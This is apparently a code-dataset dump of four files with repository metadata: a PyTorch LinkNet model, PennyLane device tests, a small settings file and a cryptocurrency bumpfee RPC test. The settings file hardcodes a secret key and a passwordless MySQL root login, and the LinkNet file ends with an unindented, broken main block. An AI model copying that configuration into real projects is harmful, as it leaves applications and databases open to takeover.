            self.downsample = nn.Sequential(
                nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(out_planes),
            )

    def forward(self, x):
        shortcut = x if self.downsample is None else self.downsample(x)
        y = self.relu(self.bn1(self.conv1(x)))
        y = self.bn2(self.conv2(y))
        return self.relu(y + shortcut)
class Encoder(nn.Module):
    """LinkNet encoder stage: two stacked BasicBlocks; only the first one
    may downsample (via `stride`)."""

    def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0, groups=1, bias=False):
        super(Encoder, self).__init__()
        self.block1 = BasicBlock(in_planes, out_planes, kernel_size, stride, padding, groups, bias)
        self.block2 = BasicBlock(out_planes, out_planes, kernel_size, 1, padding, groups, bias)

    def forward(self, x):
        # Run the input through both residual blocks in sequence.
        return self.block2(self.block1(x))
class Decoder(nn.Module):
    """LinkNet decoder stage: 1x1 channel-reduce -> transposed-conv
    upsample -> 1x1 channel-expand, with the upsampled map cropped to the
    matching encoder feature map's spatial size."""

    def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0, output_padding=0, groups=1, bias=False):
        # TODO bias=True
        super(Decoder, self).__init__()
        # Creation order (conv1, tp_conv, conv2) kept for reproducible init.
        self.conv1 = nn.Sequential(
            nn.Conv2d(in_planes, in_planes // 4, 1, 1, 0, bias=bias),
            nn.BatchNorm2d(in_planes // 4),
            nn.ReLU(inplace=True))
        self.tp_conv = nn.Sequential(
            nn.ConvTranspose2d(in_planes // 4, in_planes // 4, kernel_size, stride, padding, output_padding, bias=bias),
            nn.BatchNorm2d(in_planes // 4),
            nn.ReLU(inplace=True))
        self.conv2 = nn.Sequential(
            nn.Conv2d(in_planes // 4, out_planes, 1, 1, 0, bias=bias),
            nn.BatchNorm2d(out_planes),
            nn.ReLU(inplace=True))

    def forward(self, x_high_level, x_low_level):
        y = self.conv1(x_high_level)
        y = self.tp_conv(y)
        # Crop to the skip connection's spatial size so the later addition in
        # the network lines up (handles odd input dimensions).
        y = center_crop(y, x_low_level.size()[2], x_low_level.size()[3])
        return self.conv2(y)
def center_crop(layer, max_height, max_width):
    """Crop an NCHW tensor symmetrically to (max_height, max_width).

    When the size difference is odd, the extra row/column is dropped from
    the bottom/right.
    """
    height, width = layer.size()[2], layer.size()[3]
    top = (height - max_height) // 2
    left = (width - max_width) // 2
    return layer[:, :, top:top + max_height, left:left + max_width]
def up_pad(layer, skip_height, skip_width):
    """Zero-pad an NCHW tensor (roughly centred) up to
    (skip_height, skip_width); any odd leftover goes to the right/bottom."""
    pad_h = skip_height - layer.size()[2]
    pad_w = skip_width - layer.size()[3]
    # F.pad order for 4D input: (left, right, top, bottom).
    return F.pad(layer, [pad_w // 2, pad_w - pad_w // 2,
                         pad_h // 2, pad_h - pad_h // 2])
class LinkNetImprove(nn.Module):
    """LinkNet variant whose encoder reuses a pretrained ResNet-18
    (torchvision); decoder outputs are added to the matching encoder
    feature maps (skip connections) before the final classifier upsamples
    back to the input resolution.
    """

    def __init__(self, classes=19):
        """
        Model initialization
        :param classes: number of output segmentation classes
        :type classes: int
        """
        super().__init__()
        # NOTE(review): downloads ImageNet weights on first use.
        base = resnet.resnet18(pretrained=True)
        # Stem: conv + BN + ReLU + maxpool, reused from ResNet-18.
        self.in_block = nn.Sequential(
            base.conv1,
            base.bn1,
            base.relu,
            base.maxpool
        )
        self.encoder1 = base.layer1
        self.encoder2 = base.layer2
        self.encoder3 = base.layer3
        self.encoder4 = base.layer4
        # Decoder stages mirror the encoder channel widths (64/128/256/512).
        self.decoder1 = Decoder(64, 64, 3, 1, 1, 0)
        self.decoder2 = Decoder(128, 64, 3, 2, 1, 1)
        self.decoder3 = Decoder(256, 128, 3, 2, 1, 1)
        self.decoder4 = Decoder(512, 256, 3, 2, 1, 1)
        # Classifier
        self.tp_conv1 = nn.Sequential(nn.ConvTranspose2d(64, 32, 3, 2, 1, 1),
                                      nn.BatchNorm2d(32),
                                      nn.ReLU(inplace=True), )
        self.conv2 = nn.Sequential(nn.Conv2d(32, 32, 3, 1, 1),
                                   nn.BatchNorm2d(32),
                                   nn.ReLU(inplace=True), )
        self.tp_conv2 = nn.ConvTranspose2d(32, classes, 2, 2, 0)

    def forward(self, x):
        # Initial block
        x = self.in_block(x)
        # Encoder blocks
        e1 = self.encoder1(x)
        e2 = self.encoder2(e1)
        e3 = self.encoder3(e2)
        e4 = self.encoder4(e3)
        # Decoder blocks with additive skip connections from the encoder
        d4 = e3 + self.decoder4(e4, e3)
        d3 = e2 + self.decoder3(d4, e2)
        d2 = e1 + self.decoder2(d3, e1)
        d1 = x + self.decoder1(d2, x)
        # Classifier: upsample twice back to the input resolution
        y = self.tp_conv1(d1)
        y = self.conv2(y)
        y = self.tp_conv2(y)
        return y
class LinkNet(nn.Module):
    """LinkNet built from scratch (no pretrained weights): an initial
    stem, four Encoder stages, four Decoder stages with additive skip
    connections, and a transposed-conv classifier head.
    """

    def __init__(self, classes=19):
        """
        Model initialization
        :param classes: number of output segmentation classes
        :type classes: int
        """
        super().__init__()
        # Stem: 7x7 stride-2 conv + BN + ReLU + stride-2 maxpool.
        self.conv1 = nn.Conv2d(3, 64, 7, 2, 3, bias=False)
        self.bn1 = nn.BatchNorm2d(64)
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool2d(3, 2, 1)
        # Encoder stages double the channels while halving the resolution.
        self.encoder1 = Encoder(64, 64, 3, 1, 1)
        self.encoder2 = Encoder(64, 128, 3, 2, 1)
        self.encoder3 = Encoder(128, 256, 3, 2, 1)
        self.encoder4 = Encoder(256, 512, 3, 2, 1)
        self.decoder4 = Decoder(512, 256, 3, 2, 1, 1)
        self.decoder3 = Decoder(256, 128, 3, 2, 1, 1)
        self.decoder2 = Decoder(128, 64, 3, 2, 1, 1)
        self.decoder1 = Decoder(64, 64, 3, 1, 1, 0)
        # Classifier
        self.tp_conv1 = nn.Sequential(nn.ConvTranspose2d(64, 32, 3, 2, 1, 1),
                                      nn.BatchNorm2d(32),
                                      nn.ReLU(inplace=True), )
        self.conv2 = nn.Sequential(nn.Conv2d(32, 32, 3, 1, 1),
                                   nn.BatchNorm2d(32),
                                   nn.ReLU(inplace=True), )
        self.tp_conv2 = nn.ConvTranspose2d(32, classes, 2, 2, 0)

    def forward(self, x):
        # Initial block
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.maxpool(x)
        # Encoder blocks
        e1 = self.encoder1(x)
        e2 = self.encoder2(e1)
        e3 = self.encoder3(e2)
        e4 = self.encoder4(e3)
        # Decoder blocks with additive skip connections from the encoder
        d4 = e3 + self.decoder4(e4, e3)
        d3 = e2 + self.decoder3(d4, e2)
        d2 = e1 + self.decoder2(d3, e1)
        d1 = x + self.decoder1(d2, x)
        # Classifier: upsample twice back to the input resolution
        y = self.tp_conv1(d1)
        y = self.conv2(y)
        y = self.tp_conv2(y)
        return y
"""print layers and params of network"""
if __name__ == '__main__':
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model = LinkNet(classes=11).to(device)
summary(model, (3, 512, 1024))
| [
"995959149@qq.com"
] | 995959149@qq.com |
cc974e88dd267b0c5ec00ef6321af8552980d526 | 347731bdab0fb2530ecfa90026e354a31205caf0 | /pennylane/devices/tests/test_properties.py | e7213938611c365b447fbc24f90b56f117fa3298 | [
"Apache-2.0"
] | permissive | apv-8/pennylane | 83c52a9f956b3fdb636764f529c1f0dd0d952c63 | 8792f0f88178f70a04d6f7afbbb9dd90d2e758b3 | refs/heads/master | 2023-02-20T17:44:18.041986 | 2021-01-21T20:07:56 | 2021-01-21T20:07:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,444 | py | # Copyright 2018-2020 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests that a device has the right attributes, arguments and methods."""
# pylint: disable=no-self-use
import pytest
import pennylane.numpy as pnp
import pennylane as qml
from pennylane._device import DeviceError
try:
import tensorflow as tf
TF_SUPPORT = True
except ImportError:
TF_SUPPORT = False
try:
import jax
JAX_SUPPORT = True
except ImportError:
JAX_SUPPORT = False
# Shared test data =====
def qfunc_no_input():
    """Model agnostic quantum function: measures the identity observable,
    which is defined for both qubit and CV devices."""
    return qml.expval(qml.Identity(wires=0))
def qfunc_tensor_obs():
    """Model agnostic quantum function measuring a tensor-product
    observable (identity on wires 0 and 1)."""
    return qml.expval(qml.Identity(wires=0) @ qml.Identity(wires=1))
def qfunc_probs():
    """Model agnostic quantum function returning the probabilities of
    wire 0."""
    return qml.probs(wires=0)
def qfunc_with_scalar_input(model=None):
    """Build a model-dependent quantum function that takes a single scalar
    input ("qubit" -> RX rotation, "cv" -> displacement)."""

    def circuit(x):
        # Feed the scalar into the model's native single-parameter gate.
        if model == "qubit":
            qml.RX(x, wires=0)
        elif model == "cv":
            qml.Displacement(x, 0.0, wires=0)
        return qml.expval(qml.Identity(wires=0))

    return circuit
# =======================
class TestDeviceProperties:
    """Test the device is created with the expected properties."""

    def test_load_device(self, device_kwargs):
        """Test that the device loads correctly and exposes the standard
        attributes (num_wires, shots, short_name, analytic)."""
        device_kwargs["wires"] = 2
        device_kwargs["shots"] = 1234
        dev = qml.device(**device_kwargs)
        assert dev.num_wires == 2
        assert dev.shots == 1234
        assert dev.short_name == device_kwargs["name"]
        assert hasattr(dev, "analytic")

    def test_no_wires_given(self, device_kwargs):
        """Test that device creation fails when the required `wires`
        argument is missing."""
        with pytest.raises(TypeError, match="missing 1 required positional argument"):
            qml.device(**device_kwargs)

    def test_no_0_shots(self, device_kwargs):
        """Test that non-analytic devices cannot accept 0 shots."""
        # first create a valid device to extract its capabilities
        device_kwargs["wires"] = 2
        device_kwargs["shots"] = 0
        with pytest.raises(DeviceError, match="The specified number of shots needs to be"):
            qml.device(**device_kwargs)
class TestCapabilities:
    """Test that the device declares its capabilities correctly."""

    def test_has_capabilities_dictionary(self, device_kwargs):
        """Test that the device class has a capabilities() method returning a dictionary."""
        device_kwargs["wires"] = 1
        dev = qml.device(**device_kwargs)
        cap = dev.capabilities()
        assert isinstance(cap, dict)

    def test_model_is_defined_valid_and_correct(self, device_kwargs):
        """Test that the capabilities dictionary defines a valid model."""
        device_kwargs["wires"] = 1
        dev = qml.device(**device_kwargs)
        cap = dev.capabilities()
        assert "model" in cap
        assert cap["model"] in ["qubit", "cv"]
        qnode = qml.QNode(qfunc_no_input, dev)
        # assert that device can measure an observable from its model
        qnode()

    def test_passthru_interface_is_correct(self, device_kwargs):
        """Test that the capabilities dictionary defines a valid passthru interface, if not None."""
        device_kwargs["wires"] = 1
        dev = qml.device(**device_kwargs)
        cap = dev.capabilities()
        if "passthru_interface" not in cap:
            pytest.skip("No passthru_interface capability specified by device.")
        interface = cap["passthru_interface"]
        assert interface in ["tf", "autograd", "jax"]  # for new interface, add test case
        qfunc = qfunc_with_scalar_input(cap["model"])
        qnode = qml.qnodes.passthru.PassthruQNode(qfunc, dev)
        qnode.interface = interface
        # assert that we can do a simple gradient computation in the passthru
        # interface without raising an error
        if interface == "tf":
            if TF_SUPPORT:
                x = tf.Variable(0.1)
                with tf.GradientTape() as tape:
                    res = qnode(x)
                tape.gradient(res, [x])
            else:
                pytest.skip("Cannot import tensorflow.")
        if interface == "autograd":
            x = pnp.array(0.1, requires_grad=True)
            g = qml.grad(qnode)
            g(x)
        if interface == "jax":
            if JAX_SUPPORT:
                x = pnp.array(0.1, requires_grad=True)
                g = jax.grad(lambda a: qnode(a).reshape(()))
                g(x)
            else:
                pytest.skip("Cannot import jax")

    def test_provides_jacobian(self, device_kwargs):
        """Test that the device computes the jacobian iff it declares
        provides_jacobian."""
        device_kwargs["wires"] = 1
        dev = qml.device(**device_kwargs)
        cap = dev.capabilities()
        if "provides_jacobian" not in cap:
            pytest.skip("No provides_jacobian capability specified by device.")
        qnode = qml.QNode(qfunc_no_input, dev)
        assert cap["provides_jacobian"] == hasattr(qnode, "jacobian")

    def test_supports_tensor_observables(self, device_kwargs):
        """Tests that the device reports correctly whether it supports tensor observables."""
        device_kwargs["wires"] = 2
        dev = qml.device(**device_kwargs)
        cap = dev.capabilities()
        if "supports_tensor_observables" not in cap:
            pytest.skip("No supports_tensor_observables capability specified by device.")
        qnode = qml.QNode(qfunc_tensor_obs, dev)
        if cap["supports_tensor_observables"]:
            qnode()
        else:
            with pytest.raises(qml.QuantumFunctionError):
                qnode()

    def test_reversible_diff(self, device_kwargs):
        """Tests that the device reports correctly whether it supports reversible differentiation."""
        device_kwargs["wires"] = 1
        dev = qml.device(**device_kwargs)
        cap = dev.capabilities()
        if "supports_reversible_diff" not in cap:
            pytest.skip("No supports_reversible_diff capability specified by device.")
        if cap["supports_reversible_diff"]:
            qfunc = qfunc_with_scalar_input(model=cap["model"])
            qnode = qml.QNode(qfunc, dev, diff_method="reversible")
            g = qml.grad(qnode)
            g(0.1)
        # no need to check else statement, since the reversible qnode creation fails in that case by default

    def test_returns_state(self, device_kwargs):
        """Tests that the device reports correctly whether it returns the quantum state."""
        device_kwargs["wires"] = 1
        dev = qml.device(**device_kwargs)
        cap = dev.capabilities()
        if "returns_state" not in cap:
            pytest.skip("No returns_state capability specified by device.")
        qnode = qml.QNode(qfunc_no_input, dev)
        qnode()
        if cap["returns_state"]:
            assert dev.state is not None
        else:
            # dev.state should either be missing or None
            try:
                state = dev.state
            except AttributeError:
                state = None
            assert state is None

    def test_returns_probs(self, device_kwargs):
        """Tests that the device reports correctly whether it can return probabilities."""
        device_kwargs["wires"] = 1
        dev = qml.device(**device_kwargs)
        cap = dev.capabilities()
        if "returns_probs" not in cap:
            pytest.skip("No returns_probs capability specified by device.")
        qnode = qml.QNode(qfunc_probs, dev)
        if cap["returns_probs"]:
            qnode()
        else:
            with pytest.raises(NotImplementedError):
                qnode()
# TODO: Add tests for supports_finite_shots and supports_analytic_computation
# once the shots refactor is done
| [
"noreply@github.com"
] | apv-8.noreply@github.com |
4068279ea9672c4f52ddfbe0952f68fcf9605fc5 | 3a48d60ba07f240cdfd18e0165dd30a0cd294dc2 | /project/Setting.py | b4e9ea9e906c7b62745847f3f59865dbc328e698 | [] | no_license | aminubi/jobpool | 1184a63d0843b3dac6c1e256f45466029ad46404 | 027d81927227a40dacc1352cfe4e51d5633ebea5 | refs/heads/main | 2023-05-07T16:39:26.175879 | 2021-05-29T00:05:32 | 2021-05-29T00:05:32 | 362,092,772 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 119 | py | DB_SQLITE ='sqlite:///dbjobpool.sqlite'
DB_MYSQL ='mysql://root:''@localhost/dbjobpool'
KEY = 'Thisismysecretkey@@@@&&' | [
"aminu21@gmail.com"
] | aminu21@gmail.com |
79f7f3f9cb4fe14bc387ba58a753639478bd0990 | 2e56e031a809b10f7c60dca72de91ca208b4c3e1 | /test/functional/bumpfee.py | def7a94eefedff75a9d6c26dd190b6328e83e44e | [
"MIT"
] | permissive | dakecoin/dakecoin | c1cd56e73a63f406e333b7a74375a2c86805e5a8 | 8b9710a809c0ec2951fedb63f6e57f2a64bd5a34 | refs/heads/master | 2020-03-22T03:47:03.955283 | 2018-07-03T01:12:58 | 2018-07-03T01:12:58 | 139,452,155 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,500 | py | #!/usr/bin/env python3
# Copyright (c) 2016-2017 The DakeCoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the bumpfee RPC.
Verifies that the bumpfee RPC creates replacement transactions successfully when
its preconditions are met, and returns appropriate errors in other cases.
This module consists of around a dozen individual test cases implemented in the
top-level functions named as test_<test_case_description>. The test functions
can be disabled or reordered if needed for debugging. If new test cases are
added in the future, they should try to follow the same convention and not
make assumptions about execution order.
"""
from segwit import send_to_witness
from test_framework.test_framework import DakeCoinTestFramework
from test_framework import blocktools
from test_framework.mininode import CTransaction
from test_framework.util import *
import io
# Sequence number that is BIP 125 opt-in and BIP 68-compliant
BIP125_SEQUENCE_NUMBER = 0xfffffffd
WALLET_PASSPHRASE = "test"
WALLET_PASSPHRASE_TIMEOUT = 3600
class BumpFeeTest(DakeCoinTestFramework):
    """Driver: set up two connected nodes (node 1 with RBF enabled), fund
    the RBF wallet, then run each bumpfee scenario function below."""

    def set_test_params(self):
        # Node i gets -walletrbf=i: node 0 is non-RBF, node 1 opts in.
        self.num_nodes = 2
        self.setup_clean_chain = True
        self.extra_args = [["-prematurewitness", "-walletprematurewitness", "-walletrbf={}".format(i)]
                           for i in range(self.num_nodes)]

    def run_test(self):
        # Encrypt wallet for test_locked_wallet_fails test
        self.nodes[1].node_encrypt_wallet(WALLET_PASSPHRASE)
        self.start_node(1)
        self.nodes[1].walletpassphrase(WALLET_PASSPHRASE, WALLET_PASSPHRASE_TIMEOUT)
        connect_nodes_bi(self.nodes, 0, 1)
        self.sync_all()
        peer_node, rbf_node = self.nodes
        rbf_node_address = rbf_node.getnewaddress()
        # fund rbf node with 25 outputs of 0.001 btc (100,000 satoshis each)
        self.log.info("Mining blocks...")
        peer_node.generate(110)
        self.sync_all()
        for i in range(25):
            peer_node.sendtoaddress(rbf_node_address, 0.001)
        self.sync_all()
        peer_node.generate(1)
        self.sync_all()
        assert_equal(rbf_node.getbalance(), Decimal("0.025"))
        self.log.info("Running tests")
        dest_address = peer_node.getnewaddress()
        test_simple_bumpfee_succeeds(rbf_node, peer_node, dest_address)
        test_segwit_bumpfee_succeeds(rbf_node, dest_address)
        test_nonrbf_bumpfee_fails(peer_node, dest_address)
        test_notmine_bumpfee_fails(rbf_node, peer_node, dest_address)
        test_bumpfee_with_descendant_fails(rbf_node, rbf_node_address, dest_address)
        test_small_output_fails(rbf_node, dest_address)
        test_dust_to_fee(rbf_node, dest_address)
        test_settxfee(rbf_node, dest_address)
        test_rebumping(rbf_node, dest_address)
        test_rebumping_not_replaceable(rbf_node, dest_address)
        test_unconfirmed_not_spendable(rbf_node, rbf_node_address)
        test_bumpfee_metadata(rbf_node, dest_address)
        test_locked_wallet_fails(rbf_node, dest_address)
        self.log.info("Success")
def test_simple_bumpfee_succeeds(rbf_node, peer_node, dest_address):
    """bumpfee raises the fee, the replacement propagates to both mempools,
    and the wallet links original and replacement transactions."""
    rbfid = spend_one_input(rbf_node, dest_address)
    rbftx = rbf_node.gettransaction(rbfid)
    sync_mempools((rbf_node, peer_node))
    assert rbfid in rbf_node.getrawmempool() and rbfid in peer_node.getrawmempool()
    bumped_tx = rbf_node.bumpfee(rbfid)
    assert_equal(bumped_tx["errors"], [])
    # the bump must pay strictly more than the original fee
    assert bumped_tx["fee"] - abs(rbftx["fee"]) > 0
    # check that bumped_tx propagates, original tx was evicted and has a wallet conflict
    sync_mempools((rbf_node, peer_node))
    assert bumped_tx["txid"] in rbf_node.getrawmempool()
    assert bumped_tx["txid"] in peer_node.getrawmempool()
    assert rbfid not in rbf_node.getrawmempool()
    assert rbfid not in peer_node.getrawmempool()
    oldwtx = rbf_node.gettransaction(rbfid)
    assert len(oldwtx["walletconflicts"]) > 0
    # check wallet transaction replaces and replaced_by values
    bumpedwtx = rbf_node.gettransaction(bumped_tx["txid"])
    assert_equal(oldwtx["replaced_by_txid"], bumped_tx["txid"])
    assert_equal(bumpedwtx["replaces_txid"], rbfid)
def test_segwit_bumpfee_succeeds(rbf_node, dest_address):
    """bumpfee works on a transaction that spends a segwit output."""
    # Create a transaction with segwit output, then create an RBF transaction
    # which spends it, and make sure bumpfee can be called on it.
    segwit_in = next(u for u in rbf_node.listunspent() if u["amount"] == Decimal("0.001"))
    segwit_out = rbf_node.validateaddress(rbf_node.getnewaddress())
    rbf_node.addwitnessaddress(segwit_out["address"])
    segwitid = send_to_witness(
        use_p2wsh=False,
        node=rbf_node,
        utxo=segwit_in,
        pubkey=segwit_out["pubkey"],
        encode_p2sh=False,
        amount=Decimal("0.0009"),
        sign=True)
    # BIP 125 opt-in sequence number makes the spend replaceable
    rbfraw = rbf_node.createrawtransaction([{
        'txid': segwitid,
        'vout': 0,
        "sequence": BIP125_SEQUENCE_NUMBER
    }], {dest_address: Decimal("0.0005"),
         rbf_node.getrawchangeaddress(): Decimal("0.0003")})
    rbfsigned = rbf_node.signrawtransaction(rbfraw)
    rbfid = rbf_node.sendrawtransaction(rbfsigned["hex"])
    assert rbfid in rbf_node.getrawmempool()
    bumped_tx = rbf_node.bumpfee(rbfid)
    assert bumped_tx["txid"] in rbf_node.getrawmempool()
    assert rbfid not in rbf_node.getrawmempool()
def test_nonrbf_bumpfee_fails(peer_node, dest_address):
    """bumpfee rejects a transaction that did not opt in to BIP 125."""
    # cannot replace a non RBF transaction (from node which did not enable RBF)
    not_rbfid = peer_node.sendtoaddress(dest_address, Decimal("0.00090000"))
    assert_raises_rpc_error(-4, "not BIP 125 replaceable", peer_node.bumpfee, not_rbfid)
def test_notmine_bumpfee_fails(rbf_node, peer_node, dest_address):
    """bumpfee rejects a transaction containing inputs the wallet does not own."""
    # cannot bump fee unless the tx has only inputs that we own.
    # here, the rbftx has a peer_node coin and then adds a rbf_node input
    # Note that this test depends upon the RPC code checking input ownership prior to change outputs
    # (since it can't use fundrawtransaction, it lacks a proper change output)
    utxos = [node.listunspent()[-1] for node in (rbf_node, peer_node)]
    inputs = [{
        "txid": utxo["txid"],
        "vout": utxo["vout"],
        "address": utxo["address"],
        "sequence": BIP125_SEQUENCE_NUMBER
    } for utxo in utxos]
    output_val = sum(utxo["amount"] for utxo in utxos) - Decimal("0.001")
    rawtx = rbf_node.createrawtransaction(inputs, {dest_address: output_val})
    # both wallets must sign, since each owns one of the two inputs
    signedtx = rbf_node.signrawtransaction(rawtx)
    signedtx = peer_node.signrawtransaction(signedtx["hex"])
    rbfid = rbf_node.sendrawtransaction(signedtx["hex"])
    assert_raises_rpc_error(-4, "Transaction contains inputs that don't belong to this wallet",
                            rbf_node.bumpfee, rbfid)
def test_bumpfee_with_descendant_fails(rbf_node, rbf_node_address, dest_address):
    """bumpfee rejects a transaction that already has an in-wallet descendant."""
    # cannot bump fee if the transaction has a descendant
    # parent is send-to-self, so we don't have to check which output is change when creating the child tx
    parent_id = spend_one_input(rbf_node, rbf_node_address)
    tx = rbf_node.createrawtransaction([{"txid": parent_id, "vout": 0}], {dest_address: 0.00020000})
    tx = rbf_node.signrawtransaction(tx)
    rbf_node.sendrawtransaction(tx["hex"])
    assert_raises_rpc_error(-8, "Transaction has descendants in the wallet", rbf_node.bumpfee, parent_id)
def test_small_output_fails(rbf_node, dest_address):
    """bumpfee rejects a total fee that would shrink the change output below
    its minimum (50000 is accepted, 50001 is not)."""
    # cannot bump fee with a too-small output
    rbfid = spend_one_input(rbf_node, dest_address)
    rbf_node.bumpfee(rbfid, {"totalFee": 50000})
    rbfid = spend_one_input(rbf_node, dest_address)
    assert_raises_rpc_error(-4, "Change output is too small", rbf_node.bumpfee, rbfid, {"totalFee": 50001})
def test_dust_to_fee(rbf_node, dest_address):
    """A change output reduced to dust by the bump is dropped and absorbed
    into the fee."""
    # check that if output is reduced to dust, it will be converted to fee
    # the bumped tx sets fee=49,900, but it converts to 50,000
    rbfid = spend_one_input(rbf_node, dest_address)
    fulltx = rbf_node.getrawtransaction(rbfid, 1)
    bumped_tx = rbf_node.bumpfee(rbfid, {"totalFee": 49900})
    full_bumped_tx = rbf_node.getrawtransaction(bumped_tx["txid"], 1)
    assert_equal(bumped_tx["fee"], Decimal("0.00050000"))
    assert_equal(len(fulltx["vout"]), 2)
    assert_equal(len(full_bumped_tx["vout"]), 1)  # change output is eliminated
def test_settxfee(rbf_node, dest_address):
    """bumpfee honours the wallet-wide paytxfee set via settxfee."""
    # check that bumpfee reacts correctly to the use of settxfee (paytxfee)
    rbfid = spend_one_input(rbf_node, dest_address)
    requested_feerate = Decimal("0.00025000")
    rbf_node.settxfee(requested_feerate)
    bumped_tx = rbf_node.bumpfee(rbfid)
    actual_feerate = bumped_tx["fee"] * 1000 / rbf_node.getrawtransaction(bumped_tx["txid"], True)["vsize"]
    # Assert that the difference between the requested feerate and the actual
    # feerate of the bumped transaction is small.
    assert_greater_than(Decimal("0.00001000"), abs(requested_feerate - actual_feerate))
    rbf_node.settxfee(Decimal("0.00000000"))  # unset paytxfee
def test_rebumping(rbf_node, dest_address):
    """Re-bumping the original tx fails, but bumping the bump tx succeeds."""
    # check that re-bumping the original tx fails, but bumping the bumper succeeds
    rbfid = spend_one_input(rbf_node, dest_address)
    bumped = rbf_node.bumpfee(rbfid, {"totalFee": 2000})
    # the original is already replaced, so bumping it again is rejected
    assert_raises_rpc_error(-4, "already bumped", rbf_node.bumpfee, rbfid, {"totalFee": 3000})
    rbf_node.bumpfee(bumped["txid"], {"totalFee": 3000})
def test_rebumping_not_replaceable(rbf_node, dest_address):
    """A bump created with replaceable=False cannot itself be bumped."""
    # check that re-bumping a non-replaceable bump tx fails
    rbfid = spend_one_input(rbf_node, dest_address)
    bumped = rbf_node.bumpfee(rbfid, {"totalFee": 10000, "replaceable": False})
    assert_raises_rpc_error(-4, "Transaction is not BIP 125 replaceable", rbf_node.bumpfee, bumped["txid"],
                            {"totalFee": 20000})
def test_unconfirmed_not_spendable(rbf_node, rbf_node_address):
    """Unconfirmed outputs of replaced/replacing transactions must not be spendable."""
    # check that unconfirmed outputs from bumped transactions are not spendable
    rbfid = spend_one_input(rbf_node, rbf_node_address)
    rbftx = rbf_node.gettransaction(rbfid)["hex"]
    assert rbfid in rbf_node.getrawmempool()
    bumpid = rbf_node.bumpfee(rbfid)["txid"]
    # the bump evicts the original from the mempool
    assert bumpid in rbf_node.getrawmempool()
    assert rbfid not in rbf_node.getrawmempool()
    # check that outputs from the bump transaction are not spendable
    # due to the replaces_txid check in CWallet::AvailableCoins
    assert_equal([t for t in rbf_node.listunspent(minconf=0, include_unsafe=False) if t["txid"] == bumpid], [])
    # submit a block with the rbf tx to clear the bump tx out of the mempool,
    # then call abandon to make sure the wallet doesn't attempt to resubmit the
    # bump tx, then invalidate the block so the rbf tx will be put back in the
    # mempool. this makes it possible to check whether the rbf tx outputs are
    # spendable before the rbf tx is confirmed.
    block = submit_block_with_tx(rbf_node, rbftx)
    rbf_node.abandontransaction(bumpid)
    rbf_node.invalidateblock(block.hash)
    assert bumpid not in rbf_node.getrawmempool()
    assert rbfid in rbf_node.getrawmempool()
    # check that outputs from the rbf tx are not spendable before the
    # transaction is confirmed, due to the replaced_by_txid check in
    # CWallet::AvailableCoins
    assert_equal([t for t in rbf_node.listunspent(minconf=0, include_unsafe=False) if t["txid"] == rbfid], [])
    # check that the main output from the rbf tx is spendable after confirmed
    rbf_node.generate(1)
    assert_equal(
        sum(1 for t in rbf_node.listunspent(minconf=0, include_unsafe=False)
            if t["txid"] == rbfid and t["address"] == rbf_node_address and t["spendable"]), 1)
def test_bumpfee_metadata(rbf_node, dest_address):
    """The bumped transaction must inherit the original's comment/to metadata."""
    rbfid = rbf_node.sendtoaddress(dest_address, Decimal("0.00100000"), "comment value", "to value")
    bumped_tx = rbf_node.bumpfee(rbfid)
    bumped_wtx = rbf_node.gettransaction(bumped_tx["txid"])
    assert_equal(bumped_wtx["comment"], "comment value")
    assert_equal(bumped_wtx["to"], "to value")
def test_locked_wallet_fails(rbf_node, dest_address):
    """bumpfee must refuse to sign while the wallet is locked (RPC error -13)."""
    rbfid = spend_one_input(rbf_node, dest_address)
    rbf_node.walletlock()
    assert_raises_rpc_error(-13, "Please enter the wallet passphrase with walletpassphrase first.",
                            rbf_node.bumpfee, rbfid)
def spend_one_input(node, dest_address):
    """Spend one 0.001 BTC wallet UTXO, sending 0.0005 to *dest_address* and
    0.00049 back to a fresh change address (the remainder is the fee).

    The input carries the BIP 125 opt-in sequence so the result is replaceable.
    Returns the txid of the broadcast transaction.
    """
    utxo = next(u for u in node.listunspent() if u["amount"] == Decimal("0.00100000"))
    tx_input = dict(sequence=BIP125_SEQUENCE_NUMBER, **utxo)
    outputs = {
        dest_address: Decimal("0.00050000"),
        node.getrawchangeaddress(): Decimal("0.00049000"),
    }
    raw_tx = node.createrawtransaction([tx_input], outputs)
    signed_tx = node.signrawtransaction(raw_tx)
    return node.sendrawtransaction(signed_tx["hex"])
def submit_block_with_tx(node, tx):
    """Mine a block on top of the current tip containing *tx* (hex string) and submit it.

    Returns the solved block object so callers can later invalidate it.
    """
    ctx = CTransaction()
    ctx.deserialize(io.BytesIO(hex_str_to_bytes(tx)))
    tip = node.getbestblockhash()
    height = node.getblockcount() + 1
    # block time must advance past the median of the last blocks to be valid
    block_time = node.getblockheader(tip)["mediantime"] + 1
    block = blocktools.create_block(int(tip, 16), blocktools.create_coinbase(height), block_time)
    block.vtx.append(ctx)
    block.rehash()
    block.hashMerkleRoot = block.calc_merkle_root()
    # commit to the witness data so segwit validation passes
    blocktools.add_witness_commitment(block)
    block.solve()
    node.submitblock(bytes_to_hex_str(block.serialize(True)))
    return block
if __name__ == "__main__":
    # Entry point: run the full bumpfee functional test suite.
    BumpFeeTest().main()
| [
"dakecoin@gmail.com"
] | dakecoin@gmail.com |
